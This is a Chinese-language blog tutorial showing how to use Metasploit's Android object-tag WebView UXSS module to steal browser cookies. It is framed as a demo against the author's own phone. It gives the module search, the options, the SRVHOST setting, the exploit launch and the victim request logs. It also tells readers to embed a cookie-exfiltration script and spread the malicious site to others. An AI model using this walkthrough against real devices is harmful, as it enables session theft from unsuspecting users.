黑客攻擊的方式思路是先搜集信息,定位漏洞,然后針對不同的漏洞采用不同的方式來黑掉你。下面用metasploit模擬一次跨站腳本攻擊(黑掉自己的手機)。
1.搜集信息
msf > search android Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO auxiliary/gather/android_browser_new_tab_cookie_theft normal Android Browser "Open in New Tab" Cookie Theft auxiliary/gather/android_htmlfileprovider normal Android Content Provider File Disclosure auxiliary/gather/android_object_tag_webview_uxss 2014-10-04 normal Android Open Source Platform (AOSP) Browser UXSS auxiliary/gather/android_stock_browser_uxss normal Android Open Source Platform (AOSP) Browser UXSS auxiliary/scanner/sip/sipdroid_ext_enum normal SIPDroid Extension Grabber exploit/android/browser/samsung_knox_smdm_url 2014-11-12 normal Samsung Galaxy KNOX Android Browser RCE exploit/android/browser/webview_addjavascriptinterface 2012-12-21 normal Android Browser and WebView addJavascriptInterface Code Execution exploit/android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit exploit/android/local/futex_requeue 2014-05-03 excellent Android 'Towelroot' Futex Requeue Kernel Exploit exploit/multi/handler manual Generic Payload Handler payload/android/meterpreter/reverse_http normal Android Meterpreter, Dalvik Reverse HTTP Stager payload/android/meterpreter/reverse_https normal Android Meterpreter, Dalvik Reverse HTTPS Stager payload/android/meterpreter/reverse_tcp normal Android Meterpreter, Dalvik Reverse TCP Stager payload/android/shell/reverse_http normal Command Shell, Dalvik Reverse HTTP Stager payload/android/shell/reverse_https normal Command Shell, Dalvik Reverse HTTPS Stager payload/android/shell/reverse_tcp normal Command Shell, Dalvik Reverse TCP Stager
可以看到安卓可以利用的漏洞有很多,在這里我選擇了一個UXSS(通用跨站腳本攻擊)的漏洞,通過搜索,可以看到漏洞的具體描述。
這個漏洞的大概意思是如果黑客成功,將從你的瀏覽器中獲取到你頁面的cookie。
2.接下來利用這個漏洞,並查看該模塊的選項。
msf > use auxiliary/gather/android_object_tag_webview_uxss msf auxiliary(android_object_tag_webview_uxss) > show options Module options (auxiliary/gather/android_object_tag_webview_uxss): Name Current Setting Required Description ---- --------------- -------- ----------- CUSTOM_JS no A string of javascript to execute in the context of the target URLs. REMOTE_JS no A URL to inject into a script tag in the context of the target URLs. SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGET_URLS http://example.com yes The comma-separated list of URLs to steal. URIPATH no The URI to use for this exploit (default is random) Auxiliary action: Name Description ---- ----------- WebServer
由上圖可以看到必填字段有SRVHOST/SRVPORT/TARGET_URLS。這里才是關鍵。在這一步里,你需要做的就是搭建自己的站點,以及把獲取cookie並傳回的腳本嵌入進去!
在這里我除了SRVHOST外其他選擇默認值,只起演示作用。(后邊我會給出一個具體的例子,看別人的XSS是怎么做的)
msf auxiliary(android_object_tag_webview_uxss) > set SRVHOST 192.168.1.106 SRVHOST => 192.168.1.106
3.假設你的腳本已經站點已經搞定,接下來輸入“exploit”,服務啟動后基本快要大功告成了。
msf auxiliary(android_object_tag_webview_uxss) > exploit [*] Auxiliary module execution completed msf auxiliary(android_object_tag_webview_uxss) > [*] Using URL: http://192.168.1.106:8080/ORvS7Li6X [*] Server started.
4.接下來,你需要想辦法把你的站點擴散出去,然后坐享其成就行了。
[*] 192.168.1.105 android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X' [*] 192.168.1.105 android_object_tag_webview_uxss - Sending initial HTML ... [*] 192.168.1.105 android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X' [*] 192.168.1.105 android_object_tag_webview_uxss - Sending initial HTML ...
后記:這篇博客里對腳本制作思路和過程並沒有深入探討,具體思路可以借鑒一下這篇文章。